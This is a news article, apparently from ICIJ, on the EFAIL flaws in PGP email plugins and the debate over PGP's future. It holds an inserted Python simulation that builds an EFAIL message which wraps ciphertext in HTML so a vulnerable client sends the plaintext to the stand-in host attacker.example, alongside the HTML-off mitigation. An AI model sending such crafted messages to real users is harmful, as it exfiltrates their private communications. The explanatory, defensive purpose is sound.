At the International Consortium of Investigative Journalists, we rely on PGP encryption every day to secure our sensitive communications and data. So, it caught our attention when security researchers in Germany found vulnerabilities with specific implementations of PGP that they dubbed EFAIL.
Pretty Good Privacy, or PGP, is an encryption software developed in 1991 by Philip Zimmermann as a human rights tool for sending secure messages or files over the internet. Following PGP’s release, Zimmermann was targeted by the U.S. government for distributing cryptographic software across borders, but the case was dropped in 1996.
PGP works by generating for each user a pair of keys: a public key, which can be shared freely, and a private key, which must be kept secret. To send someone encrypted data using PGP, you need the recipient’s public key; the recipient needs your public key only to verify messages you have signed.
Data comes in many forms, from emails, which clients typically send with the Simple Mail Transfer Protocol (SMTP) and fetch with the Internet Message Access Protocol (IMAP), to videos and other large files that can be shared using the File Transfer Protocol, or FTP. When a user wants to send such data with PGP, the software uses the receiver’s public key to encrypt, or lock, it (in practice the content is encrypted with a fresh random session key, and only that session key is encrypted with the public key). The ciphertext can be intercepted in transit but cannot be read without the matching private key, which the receiver uses to decrypt (or unlock) the data. PGP protects the message body and attachments, not email metadata such as the subject line, sender and recipient.
The EFAIL vulnerability isn’t a problem with the PGP protocol itself; it concerns the email clients and plugins that automate decryption for users and then render the result as HTML.
The researchers, from Münster University of Applied Sciences, Ruhr University Bochum and KU Leuven, found that the plaintext of an encrypted email could be exposed when it was combined with HTML content in the same message. By wrapping the ciphertext in HTML markup, an attacker could make the decrypted text part of the address of an external resource such as an image; when the client fetched that resource, the plaintext was exfiltrated, or transferred without the owner’s permission, to the attacker’s server.
“The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim,” the EFAIL researchers explain. “The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.”
Common add-ons used to enable PGP encryption in email clients such as Apple Mail and Mozilla Thunderbird were vulnerable to this type of attack, but most major tools have since been patched; users need only update their software to be protected.
Pierre Romera, the chief technology officer at ICIJ, sent out a warning to ICIJ staff and members as soon as the vulnerability was made public. His primary recommendation was simple:
“Having HTML enabled in PGP email is not a good idea, and that’s why the first step to make sure you’re not exposed to any risk or attack, is to deactivate HTML in your email and deactivate external content.”
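The attack the researchers describe above and the settings Romera recommends, as an added simulation that is not part of the original article and not the EFAIL researchers’ code. It models the “direct exfiltration” variant of EFAIL: the attacker wraps a captured ciphertext between two HTML fragments, so that a client which decrypts the middle part and renders all MIME parts as one document places the plaintext inside an image URL and then requests it. The PGP decryption is a stand-in function, and attacker.example, the plaintext and the ciphertext are constructed sample data, not anything from the article.

```python
"""Simulation of EFAIL's direct-exfiltration variant and of the mitigation.

Added example; not code from the ICIJ article or from the EFAIL researchers.
Decryption is a stand-in, and the plaintext, ciphertext and attacker host are
constructed sample data.
"""
import re
from email import message_from_string
from email.message import Message
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

SECRET = "Meet the source at 9pm, Platform 3."      # constructed plaintext
CIPHERTEXT = (                                        # constructed stand-in, not a real PGP message
    "-----BEGIN PGP MESSAGE-----\n"
    "\n"
    "hQEMAxxxNOTxxxAxxxREALxxxCIPHERTEXTxxx=\n"
    "-----END PGP MESSAGE-----"
)
ATTACKER_URL = "http://attacker.example/collect?d="   # hypothetical attacker host

PGP_BLOCK = re.compile(r"-----BEGIN PGP MESSAGE-----.*?-----END PGP MESSAGE-----", re.S)
IMG_SRC = re.compile(r'<img[^>]*src="([^"]*)"', re.S | re.I)


def fake_decrypt(armored: str) -> str:
    """Stand-in for the PGP plugin, which would hand the block to GnuPG."""
    return SECRET if armored == CIPHERTEXT else "[could not decrypt]"


def build_efail_message(stolen_ciphertext: str) -> str:
    """Attacker side: wrap a captured ciphertext between two HTML fragments.

    Part 1 opens an <img> tag whose src attribute is never closed; part 3
    closes it. A client that decrypts part 2 and renders the three parts as
    one HTML document ends up with the plaintext inside the image URL.
    """
    msg = MIMEMultipart("mixed")
    msg["From"] = "attacker@attacker.example"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Fwd: notes"
    msg.attach(MIMEText('<img src="' + ATTACKER_URL, "html"))
    msg.attach(MIMEText(stolen_ciphertext, "plain"))
    msg.attach(MIMEText('">', "html"))
    return msg.as_string()


def decrypted_bodies(msg: Message) -> list:
    """Victim side, step 1: decrypt any armored PGP block found in a text part."""
    bodies = []
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        body = part.get_payload(decode=True).decode()
        bodies.append(PGP_BLOCK.sub(lambda m: fake_decrypt(m.group(0)), body))
    return bodies


def render(raw_message: str, allow_html: bool, load_remote: bool):
    """Victim side, step 2: a simulated mail client with two user settings.

    Returns (text shown to the user, URLs the client would fetch). A real HTML
    engine would percent-encode the spaces in the URL; the leak is the same.
    """
    bodies = decrypted_bodies(message_from_string(raw_message))
    fetched = []
    if allow_html:
        # Vulnerable behaviour: all body parts are concatenated into one HTML
        # document, so markup in one part can swallow the decrypted text of
        # another part.
        document = "".join(bodies)
        if load_remote:
            fetched = [m.group(1) for m in IMG_SRC.finditer(document)]
        shown = re.sub(r"<[^>]+>", "", document)   # the victim just sees a blank message
    else:
        # Mitigation from the article: HTML off and remote content off. Each
        # part is shown as literal text and nothing is fetched.
        shown = "\n".join(bodies)
    return shown, fetched


if __name__ == "__main__":
    raw = build_efail_message(CIPHERTEXT)
    for html, remote in ((True, True), (True, False), (False, False)):
        shown, fetched = render(raw, allow_html=html, load_remote=remote)
        print(f"html={html} remote={remote} -> fetched={fetched}")
```

With HTML and remote content both enabled, the only request the client makes is to attacker.example, and the decrypted text travels in the query string; with remote content disabled the request never happens, and with HTML disabled the victim sees the raw markup around their own plaintext, which is the tell-tale sign of a wrapped message. The client-side patches mentioned above fixed the rendering behaviour; the two settings shown here are the defence that does not depend on any particular plugin.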
But the discovery of EFAIL exacerbated concerns over the 27-year-old PGP protocol. In May, Wired UK declared “PGP is dead” in a piece criticizing its age and user-unfriendliness. The Electronic Frontier Foundation, or EFF, suggested readers use “alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email.”
Zimmermann held his ground in the face of the unease worming through tech circles. Alongside the founders of ProtonMail, Mailvelope and Enigmail, the cryptographer took aim at EFF in particular:
“EFF recommended that users disable PGP plugins or stop using PGP altogether. This is akin to saying, ‘Some locks can be broken; therefore we must remove all doors.’”
ICIJ’s chief technology officer appears cautious but confident in PGP’s security. Romera said he doesn’t believe a messaging app like Signal or WhatsApp will replace the practicality of the email encryption tool.
“We’re not going to drop PGP for a very good reason; it’s the best way to ensure our [email] communications are safe,” Romera said.
“There are very few alternative encryption methods for email that are as effective as PGP.”